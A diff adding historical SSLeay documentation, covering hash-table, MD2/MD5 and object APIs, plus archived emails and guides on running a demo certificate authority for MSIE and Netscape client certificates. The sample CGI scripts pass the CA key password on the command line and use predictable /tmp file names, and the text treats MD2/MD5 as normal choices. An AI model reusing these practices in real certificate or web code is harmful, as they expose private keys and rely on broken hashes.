+	called will be passed 'arg' as the second argument.
+	
+unsigned long lh_strhash(
+char *c);
+	This function is a demo string hashing function.  Since the LHASH
+	routines would normally be passed structures, this routine would
+	not normally be passed to lh_new(), rather it would be used in the
+	function passed to lh_new().
+
+The next three routines print out various statistics about the state of the
+passed hash table.  These numbers are all kept in the lhash structure.
+
+void lh_stats(
+LHASH *lh,
+FILE *out);
+	This function prints out statistics on the size of the hash table,
+	how many entries are in it, and the number and result of calls to
+	the routines in this library.
+
+void lh_node_stats(
+LHASH *lh,
+FILE *out);
+	For each 'bucket' in the hash table, the number of entries is
+	printed.
+	
+void lh_node_usage_stats(
+LHASH *lh,
+FILE *out);
+	This function prints out a short summary of the state of the hash
+	table.  It prints what I call the 'load' and the 'actual load'.
+	The load is the average number of data items per 'bucket' in the
+	hash table.  The 'actual load' is the average number of items per
+	'bucket', but only for buckets which contain entries.  So the
+	'actual load' is the average number of searches that will need to
+	find an item in the hash table, while the 'load' is the average number
+	that will be done to record a miss.
+
+==== md2.doc ========================================================
+
+The MD2 library.
+MD2 is a message digest algorithm that can be used to condense an arbitrary
+length message down to a 16 byte hash.  The functions all need to be passed
+a MD2_CTX which is used to hold the MD2 context during multiple MD2_Update()
+function calls.  The normal method of use for this library is as follows
+
+MD2_Init(...);
+MD2_Update(...);
+...
+MD2_Update(...);
+MD2_Final(...);
+
+This library requires the inclusion of 'md2.h'.
+
+The main negative about MD2 is that it is slow, especially when compared
+to MD5.
+
+The functions are as follows:
+
+void MD2_Init(
+MD2_CTX *c);
+	This function needs to be called to initiate a MD2_CTX structure for
+	use.
+	
+void MD2_Update(
+MD2_CTX *c;
+unsigned char *data;
+unsigned long len);
+	This updates the message digest context being generated with 'len'
+	bytes from the 'data' pointer.  The number of bytes can be any
+	length.
+
+void MD2_Final(
+unsigned char *md;
+MD2_CTX *c;
+	This function is called when a message digest of the data digested
+	with MD2_Update() is wanted.  The message digest is put in the 'md'
+	array and is MD2_DIGEST_LENGTH (16) bytes long.
+
+unsigned char *MD2(
+unsigned long n;
+unsigned char *d;
+unsigned char *md;
+	This function performs a MD2_Init(), followed by a MD2_Update()
+	followed by a MD2_Final() (using a local MD2_CTX).
+	The resulting digest is put into 'md' if it is not NULL.
+	Regardless of the value of 'md', the message
+	digest is returned from the function.  If 'md' was NULL, the message
+	digest returned is being stored in a static structure.
+
+==== md5.doc ========================================================
+
+The MD5 library.
+MD5 is a message digest algorithm that can be used to condense an arbitrary
+length message down to a 16 byte hash.  The functions all need to be passed
+a MD5_CTX which is used to hold the MD5 context during multiple MD5_Update()
+function calls.  This library also contains random number routines that are
+based on MD5
+
+The normal method of use for this library is as follows
+
+MD5_Init(...);
+MD5_Update(...);
+...
+MD5_Update(...);
+MD5_Final(...);
+
+This library requires the inclusion of 'md5.h'.
+
+The functions are as follows:
+
+void MD5_Init(
+MD5_CTX *c);
+	This function needs to be called to initiate a MD5_CTX structure for
+	use.
+	
+void MD5_Update(
+MD5_CTX *c;
+unsigned char *data;
+unsigned long len);
+	This updates the message digest context being generated with 'len'
+	bytes from the 'data' pointer.  The number of bytes can be any
+	length.
+
+void MD5_Final(
+unsigned char *md;
+MD5_CTX *c;
+	This function is called when a message digest of the data digested
+	with MD5_Update() is wanted.  The message digest is put in the 'md'
+	array and is MD5_DIGEST_LENGTH (16) bytes long.
+
+unsigned char *MD5(
+unsigned char *d;
+unsigned long n;
+unsigned char *md;
+	This function performs a MD5_Init(), followed by a MD5_Update()
+	followed by a MD5_Final() (using a local MD5_CTX).
+	The resulting digest is put into 'md' if it is not NULL.
+	Regardless of the value of 'md', the message
+	digest is returned from the function.  If 'md' was NULL, the message
+	digest returned is being stored in a static structure.
+
+
+==== memory.doc ========================================================
+
+In the interests of debugging SSLeay, there is an option to compile
+using some simple memory leak checking.
+
+All malloc(), free() and realloc() calls in SSLeay now go via
+Malloc(), Free() and Realloc() (except those in crypto/lhash).
+
+If CRYPTO_MDEBUG is defined, these calls are #defined to
+CRYPTO_malloc(), CRYPTO_free() and CRYPTO_realloc().
+If it is not defined, they are #defined to malloc(), free() and realloc().
+
+the CRYPTO_malloc() routines by default just call the underlying library
+functons.
+
+If CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON) is called, memory leak detection is
+turned on.  CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_OFF) turns it off.
+
+When turned on, each Malloc() or Realloc() call is recored along with the file
+and line number from where the call was made.   (This is done using the
+lhash library which always uses normal system malloc(3) routines).
+
+void CRYPTO_mem_leaks(BIO *b);
+void CRYPTO_mem_leaks_fp(FILE *fp);
+These both print out the list of memory that has not been free()ed.
+This will probably be rather hard to read, but if you look for the 'top level'
+structure allocation, this will often give an idea as to what is not being
+free()ed.  I don't expect people to use this stuff normally.
+
+==== ca.1 ========================================================
+
+From eay@orb.mincom.oz.au Thu Dec 28 23:56:45 1995
+Received: by orb.mincom.oz.au id AA07374
+  (5.65c/IDA-1.4.4 for eay); Thu, 28 Dec 1995 13:56:45 +1000
+Date: Thu, 28 Dec 1995 13:56:45 +1000 (EST)
+From: Eric Young <eay@mincom.oz.au>
+X-Sender: eay@orb
+To: sameer <sameer@c2.org>
+Cc: ssleay@mincom.oz.au
+Subject: Re: 'ca'
+In-Reply-To: <199512230440.UAA23410@infinity.c2.org>
+Message-Id: <Pine.SOL.3.91.951228133525.7269A-100000@orb>
+Mime-Version: 1.0
+Content-Type: TEXT/PLAIN; charset=US-ASCII
+Status: RO
+X-Status: 
+
+On Fri, 22 Dec 1995, sameer wrote:
+> 	I could use documentation on 'ca'. Thanks.
+
+Very quickly.
+The ca program uses the ssleay.conf file for most of its configuration
+
+./ca -help
+
+ -verbose        - Talk alot while doing things
+ -config file    - A config file. If you don't want to use the
+		   default config file
+ -name arg       - The particular CA definition to use
+	In the config file, the section to use for parameters.  This lets 
+	multiple setups to be contained in the one file.  By default, the 
+	default_ca variable is looked up in the [ ca ] section.  So in the 
+	shipped ssleay.conf, the CA definition used is CA_default.  It could be 
+	any other name.
+ -gencrl days    - Generate a new CRL, days is when the next CRL is due
+	This will generate a new certificate revocion list.
+ -days arg       - number of days to certify the certificate for
+	When certifiying certificates, this is the number of days to use.
+ -md arg         - md to use, one of md2, md5, sha or sha1
+ -policy arg     - The CA 'policy' to support
+	I'll describe this later, but there are 2 policies definied in the 
+	shipped ssleay.conf
+ -keyfile arg    - PEM RSA private key file
+ -key arg        - key to decode the RSA private key if it is encrypted
+	since we need to keep the CA's RSA key encrypted
+ -cert           - The CA certificate
+ -in file        - The input PEM encoded certificate request(s)
+ -out file       - Where to put the output file(s)
+ -outdir dir     - Where to put output certificates
+	The -out options concatinates all the output certificied
+	certificates to one file, -outdir puts them in a directory,
+	named by serial number.
+ -infiles ....   - The last argument, requests to process
+	The certificate requests to process, -in is the same.
+
+Just about all the above have default values defined in ssleay.conf.
+
+The key variables in ssleay.conf are (for the pariticular '-name' being 
+used, in the default, it is CA_default).
+
+dir is where all the CA database stuff is kept.
+certs is where all the previously issued certificates are kept.
+The database is a simple text database containing the following tab separated 
+fields.
+status: a value of 'R' - revoked, 'E' -expired or 'V' valid.
+issued date:  When the certificate was certified.
+revoked date:  When it was revoked, blank if not revoked.
+serial number:  The certificate serial number.
+certificate:	Where the certificate is located.
+CN:	The name of the certificate.
+
+The demo file has quite a few made up values it it.  The last 2 were 
+added by the ca program and are acurate.
+The CA program does not update the 'certificate' file correctly right now.
+The serial field should be unique as should the CN/status combination.
+The ca program checks these at startup.  What still needs to be 
+wrtten is a program to 'regenerate' the data base file from the issued 
+certificate list (and a CRL list).
+
+Back to the CA_default variables.
+
+Most of the variables are commented.
+
+policy is the default policy.
+
+Ok for policies, they define the order and which fields must be present 
+in the certificate request and what gets filled in.
+
+So a value of
+countryName             = match
+means that the country name must match the CA certificate.
+organizationalUnitName  = optional
+The org.Unit,Name does not have to be present and
+commonName              = supplied
+commonName must be supplied in the certificate request.
+
+For the 'policy_match' polocy, the order of the attributes in the 
+generated certiticate would be
+countryName
+stateOrProvinceName
+organizationName
+organizationalUnitName
+commonName
+emailAddress
+
+Have a play, it sort of makes sense.  If you think about how the persona 
+requests operate, it is similar to the 'policy_match' policy and the
+'policy_anything' is similar to what versign is doing.
+
+I hope this helps a bit.  Some backend scripts are definitly needed to 
+update the database and to make certificate revocion easy.  All 
+certificates issued should also be kept forever (or until they expire?)
+
+hope this helps
+eric (who has to run off an buy some cheap knee pads for the caving in 4 
+days time :-)
+
+--
+Eric Young                  | Signature removed since it was generating
+AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
+
+
+==== ms3-ca.doc ========================================================
+
+Date: Mon, 9 Jun 97 08:00:33 +0200
+From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif)
+Subject: ms3-ca.doc
+Organization: TU Ilmenau, Fak. IA, FG Telematik
+Content-Length: 14575
+Status: RO
+X-Status: 
+
+Loading client certs into MSIE 3.01
+===================================
+
+This document contains all the information necessary to successfully set up 
+some scripts to issue client certs to Microsoft Internet Explorer. It 
+includes the required knowledge about the model MSIE uses for client 
+certification and includes complete sample scripts ready to play with. The 
+scripts were tested against a modified ca program of SSLeay 0.6.6 and should 
+work with the regular ca program that comes with version 0.8.0. I haven't 
+tested against MSIE 4.0
+
+You can use the information contained in this document in either way you 
+want. However if you feel it saved you a lot of time I ask you to be as fair 
+as to mention my name: Holger Reif <reif@prakinf.tu-ilmenau.de>.
+
+1.) The model used by MSIE
+--------------------------
+
+The Internet Explorer doesn't come with a embedded engine for installing 
+client certs like Netscape's Navigator. It rather uses the CryptoAPI (CAPI) 
+defined by Microsoft. CAPI comes with WindowsNT 4.0 or is installed together 
+with Internet Explorer since 3.01. The advantage of this approach is a higher 
+flexibility because the certificates in the (per user) system open 
+certificate store may be used by other applications as well. The drawback 
+however is that you need to do a bit more work to get a client cert issued.
+
+CAPI defines functions which will handle basic cryptographic work, eg. 
+generating keys, encrypting some data, signing text or building a certificate 
+request. The procedure is as follows: A CAPI function generates you a key 
+pair and saves it into the certificate store. After that one builds a 
+Distinguished Name. Together with that key pair another CAPI function forms a 
+PKCS#10 request which you somehow need to submit to a CA. Finally the issued 
+cert is given to a yet another CAPI function which saves it into the 
+certificate store.
+
+The certificate store with the user's keys and certs is in the registry. You 
+will find it under HKEY_CURRENT_USER/Software/Microsoft/Cryptography/ (I 
+leave it to you as a little exercise to figure out what all the entries mean 
+;-). Note that the keys are protected only with the user's usual Windows 
+login password.
+
+2.) The practical usage
+-----------------------
+
+Unfortunatly since CAPI is a system API you can't access its functions from 
+HTML code directly. For this purpose Microsoft provides a wrapper called 
+certenr3.dll. This DLL accesses the CAPI functions and provides an interface 
+usable from Visual Basic Script. One needs to install that library on the 
+computer which wants to have client cert. The easiest way is to load it as an 
+ActiveX control (certenr3.dll is properly authenticode signed by MS ;-). If 
+you have ever enrolled e cert request at a CA you will have installed it.
+
+At time of writing certenr3.dll is contained in 
+http://www.microsoft.com/workshop/prog/security/csa/certenr3.exe. It comes 
+with an README file which explains the available functions. It is labeled 
+beta but every CA seems to use it anyway. The license.txt allows you the 
+usage for your own purposes (as far as I understood) and a somehow limited 
+distribution. 
+
+The two functions of main interest are GenerateKeyPair and AcceptCredentials. 
+For complete explanation of all possible parameters see the README file. Here 
+are only minimal required parameters and their values.
+
+GenerateKeyPair(sessionID, FASLE, szName, 0, "ClientAuth", TRUE, FALSE, 1)
+- sessionID is a (locally to that computer) unique string to correlate the 
+generated key pair with a cert installed later.
+- szName is the DN of the form "C=DE; S=Thueringen; L=Ilmenau; CN=Holger 
+Reif; 1.2.840.113549.1.9.1=reif@prakinf.tu-ilmenau.de". Note that S is the 
+abreviation for StateOrProvince. The recognized abreviation include CN, O, C, 
+OU, G, I, L, S, T. If the abreviation is unknown (eg. for PKCS#9 email addr) 
+you need to use the full object identifier. The starting point for searching 
+them could be crypto/objects.h since all OIDs know to SSLeay are listed 
+there.
+- note: the possible ninth parameter which should give a default name to the 
+certificate storage location doesn't seem to work. Changes to the constant 
+values in the call above doesn't seem to make sense. You can't generate 
+PKCS#10 extensions with that function.
+
+The result of GenerateKeyPair is the base64 encoded PKCS#10 request. However 
+it has a little strange format that SSLeay doesn't accept. (BTW I feel the 
+decision of rejecting that format as standard conforming.) It looks like 
+follows:
+	1st line with 76 chars
+	2nd line with 76 chars
+	...
+	(n-2)th line with 76 chars
+	(n-1)th line contains a multiple of 4 chars less then 76 (possible 
+empty)
+	(n)th line has zero or 4 chars (then with 1 or 2 equal signs - the 
+		original text's lenght wasn'T a multiple of 3) 
+	The line separator has two chars: 0x0d 0x0a
+
+AcceptCredentials(sessionID, credentials, 0, FALSE)
+- sessionID needs to be the same as while generating the key pair
+- credentials is the base64 encoded PKCS#7 object containing the cert. 
+
+CRL's and CA certs are not required simply just the client cert. (It seems to 
+me that both are not even checked somehow.) The only format of the base64 
+encoded object I succesfully used was all characters in a very long string 
+without line feeds or carriage returns. (Hey, it doesn't matter, only a 
+computer reads it!)
+
+The result should be S_OK. For error handling see the example that comes with 
+certenr3.dll.
+
+A note about ASN.1 character encodings. certenr3.dll seems to know only about 
+2 of them: UniversalString and PrintableString. First it is definitely wrong 
+for an email address which is IA5STRING (checked by ssleay's ca). Second 
+unfortunately MSIE (at least until version 3.02) can't handle UniversalString 
+correctly - they just blow up you cert store! Therefore ssleay's ca (starting 
+from version 0.8.0) tries to convert the encodings automatically to IA5STRING 
+or TeletexString. The beef is it will work only for the latin-1 (western) 
+charset. Microsoft still has to do abit of homework...
+
+3.) An example
+--------------
+
+At least you need two steps: generating the key & request and then installing 
+the certificate. A real world CA would have some more steps involved, eg. 
+accepting some license. Note that both scripts shown below are just 
+experimental state without any warrenty!
+
+First how to generate a request. Note that we can't use a static page because 
+of the sessionID. I generate it from system time plus pid and hope it is 
+unique enough. Your are free to feed it through md5 to get more impressive 
+ID's ;-) Then the intended text is read in with sed which inserts the 
+sessionID. 
+
+-----BEGIN ms-enroll.cgi-----
+#!/bin/sh
+SESSION_ID=`date '+%y%m%d%H%M%S'`$$
+echo Content-type: text/html
+echo
+sed s/template_for_sessId/$SESSION_ID/ <<EOF
+<HTML><HEAD>
+<TITLE>Certificate Enrollment Test Page</TITLE>
+</HEAD><BODY>
+
+<OBJECT
+    classid="clsid:33BEC9E0-F78F-11cf-B782-00C04FD7BF43"
+    codebase=certenr3.dll
+    id=certHelper
+    >
+</OBJECT>
+
+<CENTER>
+<H2>enrollment for a personal cert</H2>
+<BR><HR WIDTH=50%><BR><P>
+<FORM NAME="MSIE_Enrollment" ACTION="ms-gencert.cgi" ENCTYPE=x-www-form-
+encoded METHOD=POST>
+<TABLE>
+    <TR><TD>Country</TD><TD><INPUT NAME="Country" VALUE=""></TD></TR>
+    <TR><TD>State</TD><TD><INPUT NAME="StateOrProvince" VALUE=""></TD></TR>
+    <TR><TD>Location</TD><TD><INPUT NAME="Location" VALUE=""></TD></TR>
+    <TR><TD>Organization</TD><TD><INPUT NAME="Organization" 
+VALUE=""></TD></TR>
+    <TR><TD>Organizational Unit</TD>
+        <TD><INPUT NAME="OrganizationalUnit" VALUE=""></TD></TR>
+    <TR><TD>Name</TD><TD><INPUT NAME="CommonName" VALUE=""></TD></TR>
+    <TR><TD>eMail Address</TD>
+        <TD><INPUT NAME="EmailAddress" VALUE=""></TD></TR>
+    <TR><TD></TD>
+        <TD><INPUT TYPE="BUTTON" NAME="submit" VALUE="Beantragen"></TD></TR>
+</TABLE>
+	<INPUT TYPE="hidden" NAME="SessionId" VALUE="template_for_sessId">
+	<INPUT TYPE="hidden" NAME="Request" VALUE="">
+</FORM>
+<BR><HR WIDTH=50%><BR><P>
+</CENTER>
+
+<SCRIPT LANGUAGE=VBS>
+    Dim DN
+
+    Sub Submit_OnClick
+	Dim TheForm
+	Set TheForm = Document.MSIE_Enrollment
+	sessionId	= TheForm.SessionId.value
+	reqHardware     = FALSE
+	C		= TheForm.Country.value
+	SP		= TheForm.StateOrProvince.value
+	L		= TheForm.Location.value
+	O		= TheForm.Organization.value
+	OU		= TheForm.OrganizationalUnit.value
+	CN              = TheForm.CommonName.value
+	Email		= TheForm.EmailAddress.value
+        szPurpose       = "ClientAuth"
+        doAcceptanceUINow   = FALSE
+        doOnline        = TRUE
+
+	DN = ""
+
+	Call Add_RDN("C", C)
+	Call Add_RDN("S", SP)
+	Call Add_RDN("L", L)
+	Call Add_RDN("O", O)
+	Call Add_RDN("OU", OU)
+	Call Add_RDN("CN", CN)
+	Call Add_RDN("1.2.840.113549.1.9.1", Email)
+		      ' rsadsi
+				     ' pkcs
+				       ' pkcs9
+					 ' eMailAddress
+        On Error Resume Next
+        sz10 = certHelper.GenerateKeyPair(sessionId, _
+                FALSE, DN, 0, ClientAuth, FASLE, TRUE, 1)_
+        theError = Err.Number
+        On Error Goto 0
+        if (sz10 = Empty OR theError <> 0) Then
+            sz = "The error '" & Hex(theError) & "' occurred." & chr(13) & _
+                chr(10) & "Your credentials could not be generated."
+            result = MsgBox(sz, 0, "Credentials Enrollment")
+            Exit Sub
+	else 
+	    TheForm.Request.value = sz10
+	    TheForm.Submit
+        end if
+    End Sub
+
+    Sub Add_RDN(sn, value)
+	if (value <> "") then
+	    if (DN <> "") then
+		DN = DN & "; "
+	    end if
+	    DN = DN & sn & "=" & value
+	end if
+    End Sub
+</SCRIPT>
+</BODY>
+</HTML>
+EOF
+-----END ms-enroll.cgi-----
+
+Second, how to extract the request and feed the certificate back? We need to 
+"normalize" the base64 encoding of the PKCS#10 format which means 
+regenerating the lines and wrapping with BEGIN and END line. This is done by 
+gawk. The request is taken by ca the normal way. Then the cert needs to be 
+packed into a PKCS#7 structure (note: the use of a CRL is necessary for 
+crl2pkcs7 as of version 0.6.6. Starting with 0.8.0 it it might probably be 
+ommited). Finally we need to format the PKCS#7 object and generate the HTML 
+text. I use two templates to have a clearer script.
+
+1st note: postit2 is slightly modified from a program I found at ncsa's ftp 
+site. Grab it from http://www.easterngraphics.com/certs/IX9704/postit2.c. You 
+need utils.c from there too.
+
+2nd note: I'm note quite sure wether the gawk script really handles all 
+possible inputs for the request right! Today I don't use this construction 
+anymore myself.
+
+3d note: the cert must be of version 3! This could be done with the nsComment 
+line in ssleay.cnf...
+
+------BEGIN ms-gencert.cgi-----
+#!/bin/sh
+FILE="/tmp/"`date '+%y%m%d%H%M%S'-`$$
+rm -f "$FILE".*
+
+HOME=`pwd`; export HOME  # as ssleay.cnf insists on having such an env var
+cd /usr/local/ssl #where demoCA (as named in ssleay.conf) is located
+
+postit2 -s " " -i 0x0d > "$FILE".inp  # process the FORM vars
+
+SESSION_ID=`gawk '$1 == "SessionId" { print $2; exit }' "$FILE".inp`
+
+gawk \
+	'BEGIN { \
+		OFS = ""; \
+		print "-----BEGIN CERTIFICATE REQUEST-----"; \
+		req_seen=0 \
+	} \
+	$1 == "Request" { \
+		req_seen=1; \
+		if (length($2) == 72) print($2); \
+		lastline=$2; \
+		next; \
+	} \
+	{ \
+		if (req_seen == 1) { \
+			if (length($1) >= 72) print($1); \
+			else if (length(lastline) < 72) { \
+				req_seen=0; \
+				print (lastline,$1); \
+			} \
+		lastline=$1; \
+		} \
+	} \
+	END { \
+		print "-----END CERTIFICATE REQUEST-----"; \
+	}' > "$FILE".pem < "$FILE".inp 
+
+ssleay ca -batch -in "$FILE".pem -key passwd -out "$FILE".out
+ssleay crl2pkcs7 -certfile "$FILE".out -out "$FILE".pkcs7 -in demoCA/crl.pem
+
+sed s/template_for_sessId/$SESSION_ID/ <ms-enroll2a.html >"$FILE".cert
+/usr/local/bin/gawk \
+	'BEGIN	{ \
+		OFS = ""; \
+		dq = sprintf("%c",34); \
+	} \
+	$0 ~ "PKCS7" { next; } \
+	{ \
+		print dq$0dq" & _"; \
+	}' <"$FILE".pkcs7 >> "$FILE".cert
+cat  ms-enroll2b.html >>"$FILE".cert
+
+echo Content-type: text/html
+echo Content-length: `wc -c "$FILE".cert`
+echo
+cat "$FILE".cert
+rm -f "$FILE".*
+-----END ms-gencert.cgi-----
+
+----BEGIN ms-enroll2a.html----
+<HTML><HEAD><TITLE>Certificate Acceptance Test Page</TITLE></HEAD><BODY>
+
+<OBJECT
+    classid="clsid:33BEC9E0-F78F-11cf-B782-00C04FD7BF43"
+    codebase=certenr3.dll
+    id=certHelper
+    >
+</OBJECT>
+
+<CENTER>
+<H2>Your personal certificate</H2>
+<BR><HR WIDTH=50%><BR><P>
+Press the button!
+<P><INPUT TYPE=BUTTON VALUE="Nimm mich!" NAME="InstallCert">
+</CENTER>
+<BR><HR WIDTH=50%><BR>
+
+<SCRIPT LANGUAGE=VBS>
+    Sub InstallCert_OnClick
+
+	sessionId	= "template_for_sessId"
+credentials = "" & _
+----END ms-enroll2a.html----
+
+----BEGIN ms-enroll2b.html----
+""
+        On Error Resume Next
+        result = certHelper.AcceptCredentials(sessionId, credentials, 0, 
+FALSE)
+        if (IsEmpty(result)) Then
+           sz = "The error '" & Err.Number & "' occurred." & chr(13) & 
+chr(10) & "This Digital ID could not be registered."
+           msgOut = MsgBox(sz, 0, "Credentials Registration Error")
+           navigate "error.html"
+        else
+           sz = "Digital ID successfully registered."
+           msgOut = MsgBox(sz, 0, "Credentials Registration")
+           navigate "success.html"
+        end if
+	Exit Sub
+    End Sub
+</SCRIPT>
+</BODY>
+</HTML>
+----END ms-enroll2b.html----
+
+4.) What do do with the cert?
+-----------------------------
+
+The cert is visible (without restarting MSIE) under the following menu:
+View->Options->Security->Personal certs. You can examine it's contents at 
+least partially.
+
+To use it for client authentication you need to use SSL3.0 (fortunately 
+SSLeay supports it with 0.8.0). Furthermore MSIE is told to only supports a 
+kind of automatic selection of certs (I personally wasn't able to test it 
+myself). But there is a requirement that the issuer of the server cert and 
+the issuer of the client cert needs to be the same (according to a developer 
+from MS). Which means: you need may more then one cert to talk to all 
+servers...
+
+I'm sure we will get a bit more experience after ApacheSSL is available for 
+SSLeay 0.8.8.
+
+
+I hope you enjoyed reading and that in future questions on this topic will 
+rarely appear on ssl-users@moncom.com ;-)
+
+Ilmenau, 9th of June 1997
+Holger Reif <reif@prakinf.tu-ilmenau.de>
+-- 
+read you later  -  Holger Reif
+----------------------------------------  Signaturprojekt Deutsche Einheit
+TU Ilmenau - Informatik - Telematik                      (Verdamp lang her)
+Holger.Reif@PrakInf.TU-Ilmenau.DE         Alt wie ein Baum werden, um ueber
+http://Remus.PrakInf.TU-Ilmenau.DE/Reif/  alle 7 Bruecken gehen zu koennen
+
+
+==== ns-ca.doc ========================================================
+
+The following documentation was supplied by Jeff Barber, who provided the
+patch to the CA program to add this functionality.
+
+eric
+--
+Jeff Barber                                Email: jeffb@issl.atl.hp.com
+
+Hewlett Packard                            Phone: (404) 648-9503
+Internet and System Security Lab           Fax:   (404) 648-9516
+
+                         oo
+---------------------cut /\ here for ns-ca.doc ------------------------------
+
+This document briefly describes how to use SSLeay to implement a 
+certificate authority capable of dynamically serving up client
+certificates for version 3.0 beta 5 (and presumably later) versions of
+the Netscape Navigator.  Before describing how this is done, it's
+important to understand a little about how the browser implements its
+client certificate support.  This is documented in some detail in the
+URLs based at <URL:http://home.netscape.com/eng/security/certs.html>.
+Here's a brief overview:
+
+-	The Navigator supports a new HTML tag "KEYGEN" which will cause
+	the browser to generate an RSA key pair when you submit a form
+	containing the tag.  The public key, along with an optional
+	challenge (supposedly provided for use in certificate revocation
+	but I don't use it) is signed, DER-encoded, base-64 encoded
+	and sent to the web server as the value of the variable
+	whose NAME is provided in the KEYGEN tag.  The private key is
+	stored by the browser in a local key database.
+
+	This "Signed Public Key And Challenge" (SPKAC) arrives formatted
+	into 64 character lines (which are of course URL-encoded when 
+	sent via HTTP -- i.e. spaces, newlines and most punctuatation are
+	encoded as "%HH" where HH is the hex equivalent of the ASCII code).
+	Note that the SPKAC does not contain the other usual attributes
+	of a certificate request, especially the subject name fields.
+	These must be otherwise encoded in the form for submission along
+	with the SPKAC.
+
+-	Either immediately (in response to this form submission), or at
+	some later date (a real CA will probably verify your identity in
+	some way before issuing the certificate), a web server can send a
+	certificate based on the public key and other attributes back to
+	the browser by encoding it in DER (the binary form) and sending it
+	to the browser as MIME type:
+	"Content-type: application/x-x509-user-cert"
+
+	The browser uses the public key encoded in the certificate to
+	associate the certificate with the appropriate private key in
+	its local key database.  Now, the certificate is "installed".
+
+-	When a server wants to require authentication based on client
+	certificates, it uses the right signals via the SSL protocol to
+	trigger the Navigator to ask you which certificate you want to
+	send.  Whether the certificate is accepted is dependent on CA
+	certificates and so forth installed in the server and is beyond
+	the scope of this document.
+
+
+Now, here's how the SSLeay package can be used to provide client 
+certficates:
+
+-	You prepare a file for input to the SSLeay ca application.
+	The file contains a number of "name = value" pairs that identify
+	the subject.  The names here are the same subject name component
+	identifiers used in the CA section of the lib/ssleay.conf file,
+	such as "emailAddress", "commonName" "organizationName" and so
+	forth.  Both the long version and the short version (e.g. "Email",
+	"CN", "O") can be used.
+
+	One more name is supported: this one is "SPKAC".  Its value
+	is simply the value of the base-64 encoded SPKAC sent by the
+	browser (with all the newlines and other space charaters
+	removed -- and newline escapes are NOT supported).
+
+	[ As of SSLeay 0.6.4, multiple lines are supported.
+	  Put a \ at the end of each line and it will be joined with the
+	  previous line with the '\n' removed - eay ]
+	
+	Here's a sample input file:
+
+C = US
+SP = Georgia
+O = Some Organization, Inc.
+OU = Netscape Compatibility Group
+CN = John X. Doe
+Email = jxdoe@someorg.com
+SPKAC = MIG0MGAwXDANBgkqhkiG9w0BAQEFAANLADBIAkEAwmk6FMJ4uAVIYbcvIOx5+bDGTfvL8X5gE+R67ccMk6rCSGbVQz2cetyQtnI+VIs0NwdD6wjuSuVtVFbLoHonowIDAQABFgAwDQYJKoZIhvcNAQEEBQADQQBFZDUWFl6BJdomtN1Bi53mwijy1rRgJ4YirF15yBEDM3DjAQkKXHYOIX+qpz4KXKnl6EYxTnGSFL5wWt8X2iyx
+
+-	You execute the ca command (either from a CGI program run out of
+	the web server, or as a later manual task) giving it the above
+	file as input.  For example, if the file were named /tmp/cert.req,
+	you'd run:
+	$SSLDIR/bin/ca -spkac /tmp/cert.req -out /tmp/cert
+
+	The output is in DER format (binary) if a -out argument is 
+	provided, as above; otherwise, it's in the PEM format (base-64
+	encoded DER).  Also, the "-batch" switch is implied by the
+	"-spkac" so you don't get asked whether to complete the signing
+	(probably it shouldn't work this way but I was only interested
+	in hacking together an online CA that could be used for issuing
+	test certificates).
+
+	The "-spkac" capability doesn't support multiple files (I think).
+
+	Any CHALLENGE provided in the SPKAC is simply ignored.
+
+	The interactions between the identification fields you provide
+	and those identified in your lib/ssleay.conf are the same as if
+	you did an ordinary "ca -in infile -out outfile" -- that is, if
+	something is marked as required in the ssleay.conf file and it
+	isn't found in the -spkac file, the certificate won't be issued.
+
+-	Now, you pick up the output from /tmp/cert and pass it back to
+	the Navigator prepending the Content-type string described earlier.
+
+-	In order to run the ca command out of a CGI program, you must
+	provide a password to decrypt the CA's private key.  You can
+	do this by using "echo MyKeyPassword | $SSLDIR/bin/ca ..."
+	I think there's a way to not encrypt the key file in the first
+	place, but I didn't see how to do that, so I made a small change
+	to the library that allows the password to be accepted from a pipe.
+	Either way is UTTERLY INSECURE and a real CA would never do that.
+
+	[ You can use the 'ssleay rsa' command to remove the password
+	  from the private key, or you can use the '-key' option to the
+	  ca command to specify the decryption key on the command line
+	  or use the -nodes option when generating the key.
+	  ca will try to clear the command line version of the password
+	  but for quite a few operating systems, this is not possible.
+	  - eric ]
+
+So, what do you have to do to make use of this stuff to create an online 
+demo CA capability with SSLeay?
+
+1	Create an HTML form for your users.  The form should contain
+	fields for all of the required or optional fields in ssleay.conf.
+	The form must contain a KEYGEN tag somewhere with at least a NAME
+	attribute.
+
+2	Create a CGI program to process the form input submitted by the
+	browser.  The CGI program must URL-decode the variables and create
+	the file described above, containing subject identification info
+	as well as the SPKAC block.  It should then run the the ca program
+	with the -spkac option.  If it works (check the exit status),
+	return the new certificate with the appropriate MIME type.  If not,
+	return the output of the ca command with MIME type "text/plain".
+
+3	Set up your web server to accept connections signed by your demo
+	CA.  This probably involves obtaining the PEM-encoded CA certificate
+	(ordinarily in $SSLDIR/CA/cacert.pem) and installing it into a
+	server database.  See your server manual for instructions.
+
+
+==== obj.doc ========================================================
+
+The Object library.
+
+As part of my Crypto library, I found I required a method of identifying various
+objects.  These objects normally had 3 different values associated with
+them, a short text name, a long (or lower case) text name, and an
+ASN.1 Object Identifier (which is a sequence of numbers).
+This library contains a static list of objects and functions to lookup
+according to one type and to return the other types.
+
+To use these routines, 'Object.h' needs to be included.
+
+For each supported object, #define entries are defined as follows
+#define SN_Algorithm			"Algorithm"
+#define LN_algorithm			"algorithm"
+#define NID_algorithm			38
+#define OBJ_algorithm			1L,3L,14L,3L,2L
+
+SN_  stands for short name.
+LN_  stands for either long name or lowercase name.
+NID_ stands for Numeric ID.  I each object has a unique NID and this
+     should be used internally to identify objects.
+OBJ_ stands for ASN.1 Object Identifier or ASN1_OBJECT as defined in the
+     ASN1 routines.  These values are used in ASN1 encoding.
+
+The following functions are to be used to return pointers into a static
+definition of these types.  What this means is "don't try to free() any
+pointers returned from these functions.
+
+ASN1_OBJECT *OBJ_nid2obj(
+int n);
+	Return the ASN1_OBJECT that corresponds to a NID of n.
+	
+char *OBJ_nid2ln(
+int n);
+	Return the long/lower case name of the object represented by the
+	NID of n.
+	
+char *OBJ_nid2sn(
+int n);
+	Return the short name for the object represented by the NID of n.
+
+ASN1_OBJECT *OBJ_dup(
+ASN1_OBJECT *o);
+	Duplicate and return a new ASN1_OBJECT that is the same as the
+	passed parameter.
+	
+int OBJ_obj2nid(
+ASN1_OBJECT *o);
+	Given ASN1_OBJECT o, return the NID that corresponds.
+	
